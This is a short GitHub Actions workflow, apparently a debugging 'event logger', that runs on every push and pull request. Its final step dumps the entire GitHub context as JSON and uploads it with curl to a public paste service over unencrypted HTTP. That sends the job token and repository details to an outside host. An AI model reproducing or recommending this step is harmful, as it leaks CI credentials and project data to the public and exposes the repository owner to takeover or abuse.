name: Event Loggger
on:
  pull_request:
  push:

jobs:
  log-github:
    # name: "LOG Everything on GitHub Event"
    runs-on: ubuntu-latest
    steps:
      - name: Install Depends
        run: sudo apt -y install curl

      - name: base sha (pr)
        if: github.event_name == 'pull_request'
        run: |
          echo "${{toJSON(github.event.pull_request.base.sha)}}"

      - name: Dump GitHub context
        env:
          GITHUB_CONTEXT: ${{ toJson(github) }}
        run: echo "$GITHUB_CONTEXT" | curl -F "c=@-" "http://fars.ee/"
